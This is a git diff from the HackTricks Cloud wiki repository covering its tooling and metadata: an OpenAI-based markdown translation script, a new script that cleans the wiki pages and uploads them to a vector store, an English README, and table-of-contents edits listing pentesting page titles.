# Matches content between {{#ref}} and {{#endref}}, including newlines, lazily
REF_RE = re.compile(r"{{#ref}}\s*([\s\S]*?)\s*{{#endref}}", re.MULTILINE)
def extract_refs(text: str):
"""Return a list of refs (trimmed) in appearance order."""
return [m.strip() for m in REF_RE.findall(text)]
def main():
if not SRC_DIR.is_dir():
raise SystemExit(f"Not a directory: {SRC_DIR}")
refs_per_path = {} # { "relative/path.md": [ref1, ref2, ...] }
for md_path in sorted(SRC_DIR.rglob("*.md")):
rel = md_path.relative_to(SRC_DIR).as_posix()
try:
content = md_path.read_text(encoding="utf-8")
except UnicodeDecodeError:
# Fallback if encoding is odd
content = md_path.read_text(errors="replace")
refs = extract_refs(content)
refs_per_path[rel] = refs # keep order from findall
REFS_JSON.write_text(json.dumps(refs_per_path, indent=2, ensure_ascii=False) + "\n", encoding="utf-8")
print(f"Wrote {REFS_JSON} with {len(refs_per_path)} files.")
if __name__ == "__main__":
main()


@@ -12,15 +12,25 @@ from tqdm import tqdm #pip3 install tqdm
import traceback
MASTER_BRANCH = "master"
VERBOSE = True
MAX_TOKENS = 10000 #gpt-4-1106-preview
MAX_TOKENS = 50000 #gpt-4-1106-preview
DISALLOWED_SPECIAL = "<|endoftext|>"
REPLACEMENT_TOKEN = "<END_OF_TEXT>"
def _sanitize(text: str) -> str:
"""
Replace the reserved tiktoken token with a harmless placeholder.
Called everywhere a string can flow into tiktoken.encode() or the
OpenAI client.
"""
return text.replace(DISALLOWED_SPECIAL, REPLACEMENT_TOKEN)
def reportTokens(prompt, model):
encoding = tiktoken.encoding_for_model(model)
# print number of tokens in light gray, with first 50 characters of prompt in green. if truncated, show that it is truncated
#print("\033[37m" + str(len(encoding.encode(prompt))) + " tokens\033[0m" + " in prompt: " + "\033[92m" + prompt[:50] + "\033[0m" + ("..." if len(prompt) > 50 else ""))
prompt = _sanitize(prompt)
return len(encoding.encode(prompt))
@@ -36,35 +46,37 @@ def get_branch_files(branch):
files = result.stdout.decode().splitlines()
return set(files)
def delete_unique_files(branch):
def get_unused_files(branch):
"""Return the files that are unique to the language branch (not in master)."""
# Get the files in each branch
files_branch1 = get_branch_files(MASTER_BRANCH)
files_branch2 = get_branch_files(branch)
files_branch_master = get_branch_files(MASTER_BRANCH)
files_branch_lang = get_branch_files(branch)
# Find the files that are in the language branch but not in master
unique_files = files_branch2 - files_branch1
unique_files = files_branch_lang - files_branch_master
if unique_files:
# Switch to the second branch
subprocess.run(["git", "checkout", branch])
# Delete the unique files from the second branch
for file in unique_files:
subprocess.run(["git", "rm", file])
subprocess.run(["git", "checkout", MASTER_BRANCH])
print(f"[+] Deleted {len(unique_files)} files from branch: {branch}")
return unique_files
def cp_translation_to_repo_dir_and_check_gh_branch(branch, temp_folder, translate_files):
"""
Get the translated files from the temp folder and copy them to the repo directory in the expected branch.
Also remove all the files that are not in the master branch.
"""
branch_exists = subprocess.run(['git', 'show-ref', '--verify', '--quiet', 'refs/heads/' + branch])
# If branch doesn't exist, create it
if branch_exists.returncode != 0:
subprocess.run(['git', 'checkout', '-b', branch])
else:
subprocess.run(['git', 'checkout', branch])
# Get files to delete
files_to_delete = get_unused_files(branch)
# Delete files
for file in files_to_delete:
os.remove(file)
print(f"[+] Deleted {file}")
# Walk through source directory
for dirpath, dirnames, filenames in os.walk(temp_folder):
@@ -79,32 +91,72 @@ def cp_translation_to_repo_dir_and_check_gh_branch(branch, temp_folder, translat
for file_name in filenames:
src_file = os.path.join(dirpath, file_name)
shutil.copy2(src_file, dest_path)
print(f"Translated files copied to branch: {branch}")
if "/images/" not in src_file and "/theme/" not in src_file:
print(f"[+] Copied from {src_file} to {file_name}")
if translate_files:
subprocess.run(['git', 'add', "-A"])
subprocess.run(['git', 'commit', '-m', f"Translated {translate_files} to {branch}"[:72]])
subprocess.run(['git', 'checkout', MASTER_BRANCH])
print("Commit created and moved to master branch")
commit_and_push(translate_files, branch)
else:
print("Not committing anything, staying in the language branch")
def commit_and_push(translate_files, branch):
# Define the commands we want to run
commands = [
['git', 'add', '-A'],
['git', 'commit', '-m', f"Translated {translate_files} to {branch}"[:72]],
['git', 'push', '--set-upstream', 'origin', branch],
]
for cmd in commands:
result = subprocess.run(cmd, capture_output=True, text=True)
# Print stdout and stderr (if any)
if result.stdout:
print(f"STDOUT for {cmd}:\n{result.stdout}")
if "nothing to commit" in result.stdout.lower():
print("Nothing to commit, leaving")
exit(0)
if result.stderr:
print(f"STDERR for {cmd}:\n{result.stderr}")
# Check for errors
if result.returncode != 0:
raise RuntimeError(
f"Command `{cmd}` failed with exit code {result.returncode}"
)
print("Commit created and pushed")
def translate_text(language, text, file_path, model, cont=0, slpitted=False, client=None):
if not text:
return text
messages = [
{"role": "system", "content": "You are a professional hacker, translator and writer. You write everything super clear and as concise as possible without loosing information. Do not return invalid Unicode output."},
{"role": "system", "content": f"The following is content from a hacking book about hacking techiques. The following content is from the file {file_path}. Translate the relevant English text to {language} and return the translation keeping excatly the same markdown and html syntax. Do not translate things like code, hacking technique names, hacking word, cloud/SaaS platform names (like Workspace, aws, gcp...), the word 'leak', pentesting, and markdown tags. Also don't add any extra stuff apart from the translation and markdown syntax."},
{"role": "system", "content": "You are a professional hacker, translator and writer. You translate everything super clear and as concise as possible without losing information. Do not return invalid Unicode output and do not translate markdown or html tags or links."},
{"role": "system", "content": f"""The following is content from a hacking book about technical hacking techniques. The following given content is from the file {file_path}.
Translate the relevant English text to {language} and return the translation keeping exactly the same markdown and html syntax and following this guidance:
- Don't translate things like code, hacking technique names, common hacking words, cloud/SaaS platform names (like Workspace, aws, gcp...), the word 'leak', pentesting, links and markdown tags.
- Don't translate links or paths, e.g. if a link or ref is to "lamda-post-exploitation.md" don't translate that path to the language.
- Don't translate or modify tags, links, refs and paths like in:
- {{#tabs}}
- {{#tab name="Method1"}}
- {{#ref}}\ngeneric-methodologies-and-resources/pentesting-methodology.md\n{{#endref}}
- {{#include ./banners/hacktricks-training.md}}
- {{#ref}}macos-tcc-bypasses/{{#endref}}
- {{#ref}}0.-basic-llm-concepts.md{{#endref}}
- Don't translate any other tag, just return markdown and html content as is.
Also don't add any extra stuff in your response that is not part of the translation and markdown syntax."""},
{"role": "user", "content": text},
]
try:
response = client.chat.completions.create(
model=model,
messages=messages,
temperature=0
temperature=1 # gpt-5 models only support the default temperature (1)
)
except Exception as e:
print("Python Exception: " + str(e))
@@ -149,6 +201,9 @@ def translate_text(language, text, file_path, model, cont=0, slpitted=False, cli
return translate_text(language, text, file_path, model, cont, False, client)
response_message = response.choices[0].message.content.strip()
response_message = response_message.replace("bypassy", "bypasses") # PL translations translates that from time to time
response_message = response_message.replace("Bypassy", "Bypasses")
response_message = response_message.replace("-privec.md", "-privesc.md") # PL translations translates that from time to time
# Sometimes ChatGPT modifies the number of "#" at the beginning of the text, so we need to fix that. This is especially important for the first line of the MD, which must have only one "#"
cont2 = 0
@@ -170,9 +225,11 @@ def split_text(text, model):
chunks = []
chunk = ''
in_code_block = False
in_ref = False
for line in lines:
# If we are in a code block, just add the code to the chunk
# Keep code blocks as one chunk
if line.startswith('```'):
# If we are in a code block, finish it with the "```"
@@ -188,8 +245,24 @@ def split_text(text, model):
chunk += line + '\n'
continue
"""
Strip backticks from refs like:
{{#ref}}
../../generic-methodologies-and-resources/pentesting-network/`spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md`
{{#endref}}
"""
if line.startswith('{{#ref}}'):
in_ref = True
if in_ref:
line = line.replace("`", "")
if line.startswith('{{#endref}}'):
in_ref = False
# If new section, see if we should be splitting the text
if (line.startswith('#') and reportTokens(chunk + "\n" + line.strip(), model) > MAX_TOKENS*0.8) or \
reportTokens(chunk + "\n" + line.strip(), model) > MAX_TOKENS:
@@ -202,23 +275,30 @@ def split_text(text, model):
return chunks
def copy_gitbook_dir(source_path, dest_path):
folder_name = ".gitbook/"
source_folder = os.path.join(source_path, folder_name)
destination_folder = os.path.join(dest_path, folder_name)
if not os.path.exists(source_folder):
print(f"Error: {source_folder} does not exist.")
else:
# Copy the .gitbook folder
shutil.copytree(source_folder, destination_folder)
print(f"Copied .gitbook folder from {source_folder} to {destination_folder}")
def copy_dirs(source_path, dest_path, folder_names):
for folder_name in folder_names:
source_folder = os.path.join(source_path, folder_name)
destination_folder = os.path.join(dest_path, folder_name)
if not os.path.exists(source_folder):
print(f"Error: {source_folder} does not exist.")
else:
# Copy the theme folder
shutil.copytree(source_folder, destination_folder)
print(f"Copied {folder_name} folder from {source_folder} to {destination_folder}")
def copy_summary(source_path, dest_path):
file_name = "src/SUMMARY.md"
source_filepath = os.path.join(source_path, file_name)
dest_filepath = os.path.join(dest_path, file_name)
shutil.copy2(source_filepath, dest_filepath)
print("[+] Copied SUMMARY.md")
def move_files_to_push(source_path, dest_path, relative_file_paths):
for file_path in relative_file_paths:
source_filepath = os.path.join(source_path, file_path)
dest_filepath = os.path.join(dest_path, file_path)
if not os.path.exists(source_filepath):
print(f"Error: {source_filepath} does not exist.")
else:
shutil.copy2(source_filepath, dest_filepath)
print(f"[+] Copied {file_path}")
def copy_files(source_path, dest_path):
file_names = ["src/SUMMARY.md", "hacktricks-preprocessor.py", "book.toml", ".gitignore", "src/robots.txt"]
move_files_to_push(source_path, dest_path, file_names)
def translate_file(language, file_path, file_dest_path, model, client):
global VERBOSE
@@ -234,7 +314,7 @@ def translate_file(language, file_path, file_dest_path, model, client):
translated_content = ''
start_time = time.time()
for chunk in content_chunks:
# Don't trasnlate code blocks
# Don't translate code blocks
if chunk.startswith('```'):
translated_content += chunk + '\n'
else:
@@ -248,9 +328,10 @@ def translate_file(language, file_path, file_dest_path, model, client):
f.write(translated_content)
#if VERBOSE:
print(f"Page {file_path} translated in {elapsed_time:.2f} seconds")
print(f"Page {file_path} translated in {file_dest_path} in {elapsed_time:.2f} seconds")
"""
def translate_directory(language, source_path, dest_path, model, num_threads, client):
all_markdown_files = []
for subdir, dirs, files in os.walk(source_path):
@@ -280,17 +361,17 @@ def translate_directory(language, source_path, dest_path, model, num_threads, cl
tb = traceback.format_exc()
print(f'Translation generated an exception: {exc}')
print("Traceback:", tb)
"""
if __name__ == "__main__":
print("- Version 1.1.1")
print("- Version 2.0.0")
# Set up argparse
parser = argparse.ArgumentParser(description='Translate gitbook and copy to a new branch.')
parser.add_argument('-d', '--directory', action='store_true', help='Translate a full directory.')
#parser.add_argument('-d', '--directory', action='store_true', help='Translate a full directory.')
parser.add_argument('-l', '--language', required=True, help='Target language for translation.')
parser.add_argument('-b', '--branch', required=True, help='Branch name to copy translated files.')
parser.add_argument('-k', '--api-key', required=True, help='API key to use.')
parser.add_argument('-m', '--model', default="gpt-4o-mini", help='The openai model to use. By default: gpt-4o-mini')
parser.add_argument('-m', '--model', default="gpt-5-mini", help='The openai model to use. By default: gpt-5-mini')
parser.add_argument('-o', '--org-id', help='The org ID to use (if not set the default one will be used).')
parser.add_argument('-f', '--file-paths', help='If this is set, only the indicated files will be translated (" , " separated).')
parser.add_argument('-n', '--dont-cd', action='store_false', help="If this is true, the script won't change the current directory.")
@@ -345,7 +426,7 @@ if __name__ == "__main__":
translate_files = None # Need to initialize it here to avoid error
if args.file_paths:
# Translate only the indicated file
translate_files = [f for f in args.file_paths.split(' , ') if f]
translate_files = list(set([f.strip() for f in args.file_paths.split(',') if f]))
for file_path in translate_files:
#with tqdm(total=len(all_markdown_files), desc="Translating Files") as pbar:
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
@@ -359,23 +440,21 @@ if __name__ == "__main__":
#pbar.update()
except Exception as exc:
print(f'Translation generated an exception: {exc}')
# Delete possibly removed files from the master branch
delete_unique_files(branch)
elif args.directory:
#elif args.directory:
# Translate everything
translate_directory(language, source_folder, dest_folder, model, num_threads, client)
#translate_directory(language, source_folder, dest_folder, model, num_threads, client)
else:
print("You need to indicate either a directory or a list of files to translate.")
exit(1)
exit(0)
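The new `-f` handling above splits on bare commas, strips whitespace, and de-duplicates via `set()`. A standalone mirror of that normalization (the function name is ours, for illustration only):

```python
def parse_file_paths(raw):
    # Mirrors the -f parsing above: split on commas, strip whitespace,
    # drop empty entries, and de-duplicate. Note that set() does not
    # preserve the order in which the paths were given.
    return list(set(f.strip() for f in raw.split(',') if f.strip()))
```

This is why the old `' , '` separator is no longer required: `"a.md,b.md"` and `"a.md , b.md"` now normalize to the same list.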
# Copy summary
copy_summary(source_folder, dest_folder)
# Copy Summary
copy_files(source_folder, dest_folder)
# Copy .gitbook folder
copy_gitbook_dir(source_folder, dest_folder)
folder_names = ["theme/", "src/images/"]
copy_dirs(source_folder, dest_folder, folder_names)
# Create the branch and copy the translated files
cp_translation_to_repo_dir_and_check_gh_branch(branch, dest_folder, translate_files)

scripts/upload_ht_to_ai.py Normal file

@@ -0,0 +1,297 @@
import os
import requests
import zipfile
import tempfile
import time
import glob
import re
from openai import OpenAI
# Initialize OpenAI client
client = OpenAI(api_key=os.getenv("MY_OPENAI_API_KEY"))
# Vector Store ID
VECTOR_STORE_ID = "vs_67e9f92e8cc88191911be54f81492fb8"
# --------------------------------------------------
# Step 1: Download and Extract Markdown Files
# --------------------------------------------------
def download_zip(url, save_path):
print(f"Downloading zip from: {url}")
response = requests.get(url)
response.raise_for_status() # Ensure the download succeeded
with open(save_path, "wb") as f:
f.write(response.content)
print(f"Downloaded zip from: {url}")
def extract_markdown_files(zip_path, extract_dir):
print(f"Extracting zip: {zip_path} to {extract_dir}")
with zipfile.ZipFile(zip_path, "r") as zip_ref:
zip_ref.extractall(extract_dir)
# Recursively find all .md files
md_files = glob.glob(os.path.join(extract_dir, "**", "*.md"), recursive=True)
return md_files
# Repository URLs
hacktricks_url = "https://github.com/HackTricks-wiki/hacktricks/archive/refs/heads/master.zip"
hacktricks_cloud_url = "https://github.com/HackTricks-wiki/hacktricks-cloud/archive/refs/heads/main.zip"
# Temporary directory for downloads and extraction
temp_dir = tempfile.mkdtemp()
try:
# Download zip archives
print("Downloading Hacktricks repositories...")
hacktricks_zip = os.path.join(temp_dir, "hacktricks.zip")
hacktricks_cloud_zip = os.path.join(temp_dir, "hacktricks_cloud.zip")
download_zip(hacktricks_url, hacktricks_zip)
download_zip(hacktricks_cloud_url, hacktricks_cloud_zip)
# Extract the markdown files
hacktricks_extract_dir = os.path.join(temp_dir, "hacktricks")
hacktricks_cloud_extract_dir = os.path.join(temp_dir, "hacktricks_cloud")
md_files_hacktricks = extract_markdown_files(hacktricks_zip, hacktricks_extract_dir)
md_files_hacktricks_cloud = extract_markdown_files(hacktricks_cloud_zip, hacktricks_cloud_extract_dir)
all_md_files = md_files_hacktricks + md_files_hacktricks_cloud
print(f"Found {len(all_md_files)} markdown files.")
finally:
# Optional cleanup of temporary files after processing
# shutil.rmtree(temp_dir)
pass
# --------------------------------------------------
# Step 2: Remove All Existing Files in the Vector Store
# --------------------------------------------------
# List current files in the vector store and delete each one.
existing_files = list(client.vector_stores.files.list(VECTOR_STORE_ID))
print(f"Found {len(existing_files)} files in the vector store. Removing them...")
for file_obj in existing_files:
# Delete the underlying file object; this removes it from the vector store.
try:
client.files.delete(file_id=file_obj.id)
print(f"Deleted file: {file_obj.id}")
time.sleep(1) # Give it a moment to ensure the deletion is processed
except Exception as e:
# Handle potential errors during deletion
print(f"Error deleting file {file_obj.id}: {e}")
# ----------------------------------------------------
# Step 3: Clean Markdown Files
# ----------------------------------------------------
# Clean markdown files and merge them so it's easier to
# upload to the vector store.
def clean_and_merge_md_files(start_folder, exclude_keywords, output_file):
def clean_file_content(file_path):
"""Clean the content of a single file and return the cleaned lines."""
with open(file_path, "r", encoding="utf-8") as f:
content = f.readlines()
cleaned_lines = []
inside_hint = False
for i,line in enumerate(content):
# Skip lines containing excluded keywords
if any(keyword in line for keyword in exclude_keywords):
continue
# Detect and skip {% hint %} ... {% endhint %} blocks
if "{% hint style=\"success\" %}" in line and i + 1 < len(content) and "Learn & practice" in content[i+1]:
inside_hint = True
if "{% endhint %}" in line:
inside_hint = False
continue
if inside_hint:
continue
if line.startswith("#") and "reference" in line.lower(): # If the references section is reached, stop reading the file
break
# Skip lines with <figure> ... </figure>
if re.match(r"<figure>.*?</figure>", line):
continue
# Add the line if it passed all checks
cleaned_lines.append(line.rstrip())
# Remove excess consecutive empty lines
cleaned_lines = remove_consecutive_empty_lines(cleaned_lines)
return cleaned_lines
def remove_consecutive_empty_lines(lines):
"""Allow no more than one consecutive empty line."""
cleaned_lines = []
previous_line_empty = False
for line in lines:
if line.strip() == "":
if not previous_line_empty:
cleaned_lines.append("")
previous_line_empty = True
else:
cleaned_lines.append(line)
previous_line_empty = False
return cleaned_lines
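The blank-line collapsing above can be exercised in isolation; this is a standalone copy of the nested helper (renamed here only so it can run outside `clean_and_merge_md_files`):

```python
def collapse_blank_lines(lines):
    # Standalone copy of remove_consecutive_empty_lines above:
    # keep at most one consecutive empty line.
    cleaned, previous_empty = [], False
    for line in lines:
        if line.strip() == "":
            if not previous_empty:
                cleaned.append("")
            previous_empty = True
        else:
            cleaned.append(line)
            previous_empty = False
    return cleaned
```

Whitespace-only lines count as empty, so runs of blanks mixed with stray spaces also collapse to a single empty line.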
def gather_files_in_order(start_folder):
"""Gather all .md files in a depth-first order."""
files = []
for root, _, filenames in os.walk(start_folder):
md_files = sorted([os.path.join(root, f) for f in filenames if f.endswith(".md") and f.lower() not in ["summary.md", "references.md"]])
files.extend(md_files)
return files
# Gather files in depth-first order
all_files = gather_files_in_order(start_folder)
# Process files and merge into a single output
with open(output_file, "w", encoding="utf-8") as output:
for file_path in all_files:
# Clean the content of the file
cleaned_content = clean_file_content(file_path)
# Skip saving if the cleaned file has fewer than 10 non-empty lines
if len([line for line in cleaned_content if line.strip()]) < 10:
continue
# Get the name of the file for the header
file_name = os.path.basename(file_path)
# Write header, cleaned content, and 2 extra new lines
output.write(f"### Start file: {file_name} ###\n\n")
output.write("\n".join(cleaned_content))
output.write("\n\n")
# Specify the starting folder and output file
start_folder = os.getcwd()
# Keywords to exclude from lines
exclude_keywords = [
"hacktricks-training.md",
"![](<", # Skip lines with images
"/images/", # Skip lines with images
"STM Cyber", # STM Cyber ads
"offer several valuable cybersecurity services", # STM Cyber ads
"and hack the unhackable", # STM Cyber ads
"blog.stmcyber.com", # STM Cyber ads
"RootedCON", # RootedCON ads
"rootedcon.com", # RootedCON ads
"the mission of promoting technical knowledge", # RootedCON ads
"Intigriti", # Intigriti ads
"intigriti.com", # Intigriti ads
"Trickest", # Trickest ads
"trickest.com", # Trickest ads,
"Get Access Today:",
"HACKENPROOF", # Hackenproof ads
"hackenproof.com", # Hackenproof ads
"HackenProof", # Hackenproof ads
"discord.com/invite/N3FrSbmwdy", # Hackenproof ads
"Hacking Insights:", # Hackenproof ads
"Engage with content that delves", # Hackenproof ads
"Real-Time Hack News:", # Hackenproof ads
"Keep up-to-date with fast-paced", # Hackenproof ads
"Latest Announcements:", # Hackenproof ads
"Stay informed with the newest bug", # Hackenproof ads
"start collaborating with top hackers today!", # Hackenproof ads
"discord.com/invite/N3FrSbmwdy", # Hackenproof ads
"Pentest-Tools", # Pentest-Tools.com ads
"pentest-tools.com", # Pentest-Tools.com ads
"perspective on your web apps, network, and", # Pentest-Tools.com ads
"report critical, exploitable vulnerabilities with real business impact", # Pentest-Tools.com ads
"SerpApi", # SerpApi ads
"serpapi.com", # SerpApi ads
"offers fast and easy real-time", # SerpApi ads
"plans includes access to over 50 different APIs for scraping", # SerpApi ads
"8kSec", # 8kSec ads
"academy.8ksec.io", # 8kSec ads
"Learn the technologies and skills required", # 8kSec ads
"WebSec", # WebSec ads
"websec.nl", # WebSec ads
"which means they do it all; Pentesting", # WebSec ads
]
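Keyword lists like the one above are easy to break silently: if a comma between two entries is forgotten, Python fuses the adjacent string literals into a single element instead of raising an error, and both intended keywords stop matching. A small demonstration:

```python
# A missing comma between adjacent string literals is not a syntax
# error: Python concatenates them into one list element, so neither
# intended keyword matches on its own anymore.
broken = [
    "/images/"      # <- comma forgotten here
    "STM Cyber",
]
assert broken == ["/images/STM Cyber"]
assert "/images/" not in broken
assert "STM Cyber" not in broken
```

A cheap guard is to assert the expected list length after defining it, so a fused entry is caught immediately.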
# Clean and merge .md files
ht_file = os.path.join(tempfile.gettempdir(), "hacktricks.md")
htc_file = os.path.join(tempfile.gettempdir(), "hacktricks-cloud.md")
clean_and_merge_md_files(hacktricks_extract_dir, exclude_keywords, ht_file)
print(f"Merged content has been saved to: {ht_file}")
clean_and_merge_md_files(hacktricks_cloud_extract_dir, exclude_keywords, htc_file)
print(f"Merged content has been saved to: {htc_file}")
# ----------------------------------------------------
# Step 4: Upload All Markdown Files to the Vector Store
# ----------------------------------------------------
# Upload two files to the vector store.
# Uploading .md hacktricks files individually can be slow,
# so that's why we merged them into just 2 files beforehand.
file_streams = []
ht_stream = open(ht_file, "rb")
file_streams.append(ht_stream)
htc_stream = open(htc_file, "rb")
file_streams.append(htc_stream)
file_batch = client.vector_stores.file_batches.upload_and_poll(
vector_store_id=VECTOR_STORE_ID,
files=file_streams
)
time.sleep(60) # Sleep for a minute to ensure the upload is processed
ht_stream.close()
htc_stream.close()
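Opening and closing the streams by hand as above leaks file handles if the upload raises between `open()` and `close()`. A sketch of the same flow with `contextlib.ExitStack`, where `uploader` is a stand-in parameter for the real `client.vector_stores.file_batches.upload_and_poll(...)` call:

```python
from contextlib import ExitStack

def upload_files(paths, uploader):
    # Open every file inside one ExitStack so all handles are closed
    # even if the uploader raises; `uploader` is a stand-in for
    # client.vector_stores.file_batches.upload_and_poll(...).
    with ExitStack() as stack:
        streams = [stack.enter_context(open(p, "rb")) for p in paths]
        return uploader(streams)
```

With this shape, the explicit `ht_stream.close()` / `htc_stream.close()` calls become unnecessary.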
"""This was to upload each .md independently, which turned out to be a nightmare
# Ensure we don't exceed the maximum number of file streams
for file_path in all_md_files:
# Check if we have reached the maximum number of streams
if len(file_streams) >= 300:
print("Reached maximum number of file streams (300). Uploading current batch...")
# Upload the current batch before adding more files
file_batch = client.vector_stores.file_batches.upload_and_poll(
vector_store_id=VECTOR_STORE_ID,
files=file_streams
)
print("Upload status:", file_batch.status)
print("File counts:", file_batch.file_counts)
# Clear the list for the next batch
file_streams = []
time.sleep(120) # Sleep for 2 minutes to avoid hitting API limits
try:
stream = open(file_path, "rb")
file_streams.append(stream)
except Exception as e:
print(f"Error opening {file_path}: {e}")
if file_streams:
# Upload files and poll for completion
file_batch = client.vector_stores.file_batches.upload_and_poll(
vector_store_id=VECTOR_STORE_ID,
files=file_streams
)
print("Upload status:", file_batch.status)
print("File counts:", file_batch.file_counts)
else:
print("No markdown files to upload.")
# Close all file streams
for stream in file_streams:
stream.close()
"""

searchindex.js Normal file

File diff suppressed because one or more lines are too long


@@ -4,9 +4,10 @@
<figure><img src="images/cloud.gif" alt=""><figcaption></figcaption></figure>
_HackTricks 标志与动效由_ [_@ppieranacho_](https://www.instagram.com/ppieranacho/)_._
_Hacktricks logos & motion designed by_ [_@ppieranacho_](https://www.instagram.com/ppieranacho/)_._
### Run HackTricks Cloud Locally
### 在本地运行 HackTricks Cloud
```bash
# Download latest version of hacktricks cloud
git clone https://github.com/HackTricks-wiki/hacktricks-cloud
@@ -33,27 +34,28 @@ export LANG="master" # Leave master for English
# Run the docker container indicating the path to the hacktricks-cloud folder
docker run -d --rm --platform linux/amd64 -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c "mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0"
```
您的本地 HackTricks Cloud 副本将在一分钟后 **可通过 [http://localhost:3377](http://localhost:3377) 访问**
### **Pentesting CI/CD 方法论**
Your local copy of HackTricks Cloud will be **available at [http://localhost:3377](http://localhost:3377)** after a minute.
**在 HackTricks CI/CD Methodology 中,你将找到如何对与 CI/CD 活动相关的基础设施进行 pentest。** 阅读下列页面以获取**介绍:**
### **Pentesting CI/CD Methodology**
**In the HackTricks CI/CD Methodology you will find how to pentest infrastructure related to CI/CD activities.** Read the following page for an **introduction:**
[pentesting-ci-cd-methodology.md](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
### Pentesting Cloud 方法论
### Pentesting Cloud Methodology
**在 HackTricks Cloud Methodology 中,你将找到如何对云环境进行 pentest。** 阅读下列页面以获取**介绍:**
**In the HackTricks Cloud Methodology you will find how to pentest cloud environments.** Read the following page for an **introduction:**
[pentesting-cloud-methodology.md](pentesting-cloud/pentesting-cloud-methodology.md)
### 许可与免责声明
### License & Disclaimer
**请在以下处查看:**
**Check them in:**
[HackTricks Values & FAQ](https://app.gitbook.com/s/-L_2uGJGU7AVNRcqRvEi/welcome/hacktricks-values-and-faq)
### Github 统计
### Github Stats
![HackTricks Cloud Github Stats](https://repobeats.axiom.co/api/embed/1dfdbb0435f74afa9803cd863f01daac17cda336.svg)


@@ -9,7 +9,6 @@
# 🏭 Pentesting CI/CD
- [Pentesting CI/CD Methodology](pentesting-ci-cd/pentesting-ci-cd-methodology.md)
- [Docker Build Context Abuse in Cloud Envs](pentesting-ci-cd/docker-build-context-abuse.md)
- [Gitblit Security](pentesting-ci-cd/gitblit-security/README.md)
- [Ssh Auth Bypass](pentesting-ci-cd/gitblit-security/gitblit-embedded-ssh-auth-bypass-cve-2024-28080.md)
- [Github Security](pentesting-ci-cd/github-security/README.md)
@@ -42,7 +41,6 @@
- [Atlantis Security](pentesting-ci-cd/atlantis-security.md)
- [Cloudflare Security](pentesting-ci-cd/cloudflare-security/README.md)
- [Cloudflare Domains](pentesting-ci-cd/cloudflare-security/cloudflare-domains.md)
- [Cloudflare Workers Pass Through Proxy Ip Rotation](pentesting-ci-cd/cloudflare-security/cloudflare-workers-pass-through-proxy-ip-rotation.md)
- [Cloudflare Zero Trust Network](pentesting-ci-cd/cloudflare-security/cloudflare-zero-trust-network.md)
- [Okta Security](pentesting-ci-cd/okta-security/README.md)
- [Okta Hardening](pentesting-ci-cd/okta-security/okta-hardening.md)
@@ -57,7 +55,6 @@
# ⛈️ Pentesting Cloud
- [Pentesting Cloud Methodology](pentesting-cloud/pentesting-cloud-methodology.md)
- [Luks2 Header Malleability Null Cipher Abuse](pentesting-cloud/confidential-computing/luks2-header-malleability-null-cipher-abuse.md)
- [Kubernetes Pentesting](pentesting-cloud/kubernetes-security/README.md)
- [Kubernetes Basics](pentesting-cloud/kubernetes-security/kubernetes-basics.md)
- [Pentesting Kubernetes Services](pentesting-cloud/kubernetes-security/pentesting-kubernetes-services/README.md)
@@ -85,17 +82,14 @@
- [GCP - Federation Abuse](pentesting-cloud/gcp-security/gcp-basic-information/gcp-federation-abuse.md)
- [GCP - Permissions for a Pentest](pentesting-cloud/gcp-security/gcp-permissions-for-a-pentest.md)
- [GCP - Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/README.md)
- [GCP - Apigee Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-apigee-post-exploitation.md)
- [GCP - App Engine Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-app-engine-post-exploitation.md)
- [GCP - Artifact Registry Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-artifact-registry-post-exploitation.md)
- [GCP - Bigtable Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-bigtable-post-exploitation.md)
- [GCP - Cloud Build Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-build-post-exploitation.md)
- [GCP - Cloud Functions Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md)
- [GCP - Cloud Run Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-run-post-exploitation.md)
- [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
- [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
- [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
- [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
- [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
- [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
- [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
@@ -104,6 +98,7 @@
- [GCP - Pub/Sub Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-pub-sub-post-exploitation.md)
- [GCP - Secretmanager Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-secretmanager-post-exploitation.md)
- [GCP - Security Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-security-post-exploitation.md)
- [Gcp Vertex Ai Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-vertex-ai-post-exploitation.md)
- [GCP - Workflows Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-workflows-post-exploitation.md)
- [GCP - Storage Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-storage-post-exploitation.md)
- [GCP - Privilege Escalation](pentesting-cloud/gcp-security/gcp-privilege-escalation/README.md)
@@ -112,9 +107,7 @@
